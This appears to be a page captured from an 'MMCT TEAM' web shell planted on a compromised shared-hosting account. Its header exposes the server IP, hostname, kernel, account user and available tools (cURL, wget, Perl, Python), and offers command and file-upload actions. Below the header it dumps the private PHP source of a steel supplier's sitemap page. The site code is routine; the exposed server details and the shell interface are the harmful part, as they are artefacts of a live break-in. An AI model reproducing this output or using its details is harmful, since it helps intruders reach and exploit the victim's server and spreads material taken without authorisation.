MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 3.22.249.229
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/automationpowersolutions.com/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/automationpowersolutions.com/sitemap.php
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <!-- Responsive -->
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
    <?php include 'headlink.php';?>
    <title>Site Map | Automation Power Solution</title>
    <meta name="description" content="Site Map | Automation Power Solution">
    
    <style>
    
        .site-links li{
            padding:3px 0px;
        }
        .site-links li a{
            font-weight:bold;
            font-size:17px;
        }
        
    </style>
    <style>
    #loc {
        background-color: #EBE3D5;
    }

    #loc h2 span {
        color: #ea622b;
    }

    .loc-inner ul li {
        list-style: none;
        margin-bottom: 8px;
    }

    .loc-inner ul li a {
        text-decoration: none;
        color: #141414;
    }


    .loc-inner ul li:hover {
        transform: translateX(8px);
        transition: 0.4s ease-in-out;
    }


    .loc-inner ul li:hover a {
        color: #ea622b;

    }
    .py-5{
        padding:20px 0;
        width:100%;
    }
</style>
   
</head>
<body>
<?php include 'preloader.php';?>
<?php include 'header.php';?>
<section class="page-title" style="background-image: url(images/background/9.jpg)">
        <div class="auto-container">
			<ul class="bread-crumb clearfix">
				<li><a href="<?php echo $wspath?>">Home</a></li>
				<li>Site Map</li>
			</ul>
			<h1 style="color:white;">Site Map</h1>
        </div>
    </section>
    <marquee class="marquee-text"><?php echo $datamarq['message'] ?></marquee>
    
    <section id="loc" class="pb-2">
     <div class="container py-5">
        <div class="row" id="locationContainer">
            <h2 class="text-center py-5">Important <span> Links</span></h2>
            <div class="col-lg-3 text-start">
                <div class="loc-inner">
                    <ul>
                        <li><a href="<?php echo $wspath?>"><i class="fa fa-caret-right" aria-hidden="true"></i> Home</a></li>
                    </ul>
                </div>
            </div>
            <div class="col-lg-3 text-start">
                <div class="loc-inner">
                    <ul>
                        <li><a href="<?php echo $wspath?>about-us.html"><i class="fa fa-caret-right" aria-hidden="true"></i> About Us</a></li>
                    </ul>
                </div>
            </div>
            <div class="col-lg-3 text-start">
                <div class="loc-inner">
                    <ul>
                        <li><a href="<?php echo $wspath?>our-gallery.html"><i class="fa fa-caret-right" aria-hidden="true"></i> Photo Gallery</a></li>
                    </ul>
                </div>
            </div>
            <div class="col-lg-3 text-start">
                <div class="loc-inner">
                    <ul>
                        <li><a href="<?php echo $wspath?>contact.html"><i class="fa fa-caret-right" aria-hidden="true"></i> Contact </a></li>
                    </ul>
                </div>
            </div>
            <div class="col-lg-3 text-start">
                <div class="loc-inner">
                    <ul>
                        <li><a href="<?php echo $wspath?>video-gallery.html"><i class="fa fa-caret-right" aria-hidden="true"></i> Video Gallery</a></li>
                    </ul>
                </div>
            </div>
            <h2 class="text-center py-5">Products <span> Category</span></h2>
            <?php
                $sqllocc = "SELECT * FROM `tb7_product_cat`";
                $runlocc = mysqli_query($db, $sqllocc) or die("Query Not run");
                while ($datacat = mysqli_fetch_assoc($runlocc)) {
                
            ?>
            <div class="col-lg-3 text-start">
                <div class="loc-inner">
                    <ul>
                        <li><a href="<?php echo $wspath?>products<?php echo $datacat['cat_url']?>.html"><i class="fa fa-caret-right" aria-hidden="true"></i> <?php echo $datacat['cat_name']?></a></li>
                    </ul>
                </div>
            </div>
            <?php
              }
            ?>
            <h2 class="text-center py-5">Our <span> Products</span></h2>
            <?php
                   $sqlci = "SELECT * FROM `tb7_product`";
                   $runci = mysqli_query($db, $sqlci) or die("Query Not run");
                   while ($dataci = mysqli_fetch_assoc($runci)) {
                   $serviceUrl = $wspath ;
                   if (isset($_REQUEST['loc_slug'])) {
                       $loc_slug = htmlspecialchars($_REQUEST['loc_slug']);
                       $serviceUrl .=  $loc_slug. '/';
                   }
                   
                   $serviceUrl .= '' . $dataci['slug_url'] . '.html';
            ?>
            <div class="col-lg-3 text-start">
                <div class="loc-inner">
                    <ul>
                        <li><a href="<?php echo $serviceUrl; ?>"><i class="fa fa-caret-right" aria-hidden="true"></i> <?php echo $dataci['src_name']?></a></li>
                    </ul>
                </div>
            </div>
            <?php
              }
            ?>
            <h2 class="text-center py-5">Location <span> We Cover</span></h2>
            <?php
                $sqlci = "SELECT * FROM `tbl_location`";
                $runci = mysqli_query($db, $sqlci) or die("Query Not run");
                while ($dataloc = mysqli_fetch_assoc($runci)) {
            ?>
            <div class="col-lg-3 text-start">
                <div class="loc-inner">
                    <ul>
                        <li><a href="<?php echo $wspath ?><?php echo $dataloc['loc_slug']; ?>"><i class="fa fa-caret-right" aria-hidden="true"></i> <?php echo $dataloc['loc_name'] ?></a></li>
                    </ul>
                </div>
            </div>
            <?php
              }
            ?>
            <h2 class="text-center py-5">Location Wise<span> Products</span></h2>
            <?php
                $sqllocc = "SELECT * FROM `tbl_location`";
                $runlocc = mysqli_query($db, $sqllocc) or die("Query Not run");
                while ($datalocc = mysqli_fetch_assoc($runlocc)) {
                $sqlci = "SELECT * FROM `tb7_product`";
                $runci = mysqli_query($db, $sqlci) or die("Query Not run");
                while ($dataci = mysqli_fetch_assoc($runci)) {
                
            ?>
            <div class="col-lg-3 text-start">
                <div class="loc-inner">
                    <ul>
                        <li><a href="<?php echo $wspath ?><?php echo $datalocc['loc_slug']; ?>/<?php echo $dataci['slug_url']; ?>.html"><i class="fa fa-caret-right" aria-hidden="true"></i> <?php echo $dataci['src_name']?> In <?php echo $datalocc['loc_name']; ?></a></li>
                    </ul>
                </div>
            </div>
            <?php
              }
                }
            ?>
        </div>
    </div>
    </section>
    


<footer class="main-footer" style="background-image:url(<?php echo $wspath?>images/background/pattern-12.png)">
		<div class="auto-container">
			<!-- Widgets Section -->
			<div class="widgets-section">
				<div class="row clearfix">
					<!-- Big Column -->
					<div class="big-column col-lg-6 col-md-12 col-sm-12">
						<div class="row clearfix">
							<!-- Footer Column -->
							<div class="footer-column col-lg-6 col-md-6 col-sm-12">
								<div class="footer-widget logo-widget">
									<div class="logo">
										<!--<a href="index.php"><img src="images/AGTECH__1.png" alt="" /></a>-->
										<h3 style="color:white;"><?php echo $data['admin_name']?></h3>
									</div>
									<div class="text">Steel supplier in India, Delivering steel where and when you need it!</div>
									<a href="<?php echo $wspath?>about-us.html" class="theme-btn about-btn">About us</a>
								
        	                       <div id="google_translate_element"></div>

                                    <script type="text/javascript">
                                     function googleTranslateElementInit() {
                                     new google.translate.TranslateElement({ pageLanguage: 'en' }, 'google_translate_element');
                                     }
                                    </script>
                                    
                                    <script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
								</div>
							</div>
							<!-- Footer Column -->
							<div class="footer-column col-lg-6 col-md-6 col-sm-12">
								<div class="footer-widget newsletter-widget">
									<h4>Our Products</h4>
							        <ul class="contact-list">
							            <?php
                                                $sqlci = "SELECT * FROM `tb7_product` LIMIT 5";
                                                $runci = mysqli_query($db, $sqlci) or die("Query Not run");
                                                while ($dataci = mysqli_fetch_assoc($runci)) {
                                                $serviceUrl = $wspath ;
                                                if (isset($_REQUEST['loc_slug'])) {
                                                    $loc_slug = htmlspecialchars($_REQUEST['loc_slug']);
                                                    $serviceUrl .=  $loc_slug. '/';
                                                }
                                            
                                                $serviceUrl .= '' . $dataci['slug_url'] . '.html';
                                            ?>
                                            
                                            <li><a style="color:white;font-size:16px;" href="<?php echo $serviceUrl; ?>"><?php echo $dataci['src_name']?></a></li>
                                            
										    <?php 
											}
											?>
											<li><a style="color:white;font-size:16px;" href="<?php echo $wspath?>sitemap.html">Sitemap</a></li>
							        </ul>
									<!-- Social Box -->
									<ul class="social-box">
										<li><a href="<?php echo $data['fb_link']?>" class="fa fa-facebook"></a></li>
							            <li><a href="<?php echo $data['twit_link']?>" class="fa fa-twitter"></a></li>
							            <li><a href="<?php echo $data['insta_link']?>" class="fa fa-instagram"></a></li>
							            <li><a href="<?php echo $data['yt_link']?>" class="fa fa-youtube"></a></li>
							            <li><a href="<?php echo $data['linkedin_link']?>" class="fa fa-linkedin"></a></li>
									</ul>
									<!-- End Social Box -->
								</div>
							</div>
						</div>
					</div>
					
					<!-- Big Column -->
					<div class="big-column col-lg-6 col-md-12 col-sm-12">
						<div class="row clearfix">
							<!-- Footer Column -->
							<div class="footer-column col-lg-6 col-md-6 col-sm-12">
								<div class="footer-widget contact-widget">
									<h4>Official info:</h4>
									<ul class="contact-list">
										<li><span class="icon fa fa-phone"></span><?php echo $data['admin_phone']?></li>
										<li><span class="icon fa fa-envelope"></span><?php echo $data['admin_email']?></li>
									</ul>
									<div class="timing">
										<strong>Open Hours: </strong>
										Mon - Sun 9am - 9pm
									</div>
								</div>
							</div>
							<!-- Footer Column -->
							<div class="footer-column col-lg-6 col-md-6 col-sm-12">
								<div class="footer-widget instagram-widget">
									<h4>Map</h4>
									<div class="widget-content">
										<iframe src="<?php echo $data['map_link']?>" width="240" height="240" style="border:0;" allowfullscreen="" loading="lazy" referrerpolicy="no-referrer-when-downgrade"></iframe>
									</div>
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
			<div class="footer-bottom">
				<div class="copyright">&copy; 2023-2024 SADGURU-STEELS - All rights reserved. Design, Developed and Promoted By <a href="https://www.webkeyindia.com" target="_blank" style="color:white;">webkeyindia.com </a></div>
			</div>
		</div>
	</footer>
	
	<div id="social-fixed">
        <div class="sidebar">
            <div class="social facebook">
                <a href="https://www.google.com/maps/dir//Sadguru+Steels+R9V4%2B9XC+Balapar,+Uttar+Pradesh+273007/@26.84173,83.3544383,10z/data=!4m5!4m4!1m0!1m2!1m1!1s0x399145c64e7e07ad:0x68ccd745cca5ae87" target="_blank">
                    <p>Get Direction <i class="fa fa-map-marker"></i> </p>
                </a>
            </div>
            <div class="social twitter">
                <a data-toggle="modal" data-target="#exampleModal" data-whatever="@mdo">
                    <p>Get a Quote<i class="fa fa-question"></i> </p>
                </a>
            </div>
            <div class="social google">
                <a href="https://wa.me/+919554952461" target="_blank">
                    <p>Whats App<i class="fa fa-whatsapp"></i> </p>
                </a>
            </div>
        </div>
        
    </div>
<?php include 'enquiry.php';?>
<?php include 'footer-contact.php';?>

    <script src="<?php echo $wspath?>js/jquery.js"></script>
    <script src="<?php echo $wspath?>js/popper.min.js"></script>
    <script src="<?php echo $wspath?>js/bootstrap.min.js"></script>
    <script src="<?php echo $wspath?>js/jquery.mCustomScrollbar.concat.min.js"></script>
    <script src="<?php echo $wspath?>js/magnific-popup.min.js"></script>
    <script src="<?php echo $wspath?>js/appear.js"></script>
    <script src="<?php echo $wspath?>js/parallax.min.js"></script>
    <script src="<?php echo $wspath?>js/tilt.jquery.min.js"></script>
    <script src="<?php echo $wspath?>js/jquery.paroller.min.js"></script>
    <script src="<?php echo $wspath?>js/owl.js"></script>
    <script src="<?php echo $wspath?>js/wow.js"></script>
    <script src="<?php echo $wspath?>js/odometer.js"></script>
    <script src="<?php echo $wspath?>js/backToTop.js"></script>
    <script src="<?php echo $wspath?>js/jquery-ui.js"></script>
    <script src="<?php echo $wspath?>js/cursor-script.js"></script>
    <script src="<?php echo $wspath?>js/script.js"></script>
    <script src="<?php echo $wspath?>js/mixitup.js"></script>
    <script src="<?php echo $wspath?>js/slick.js"></script>
    </body>
</html>

MMCT - 2023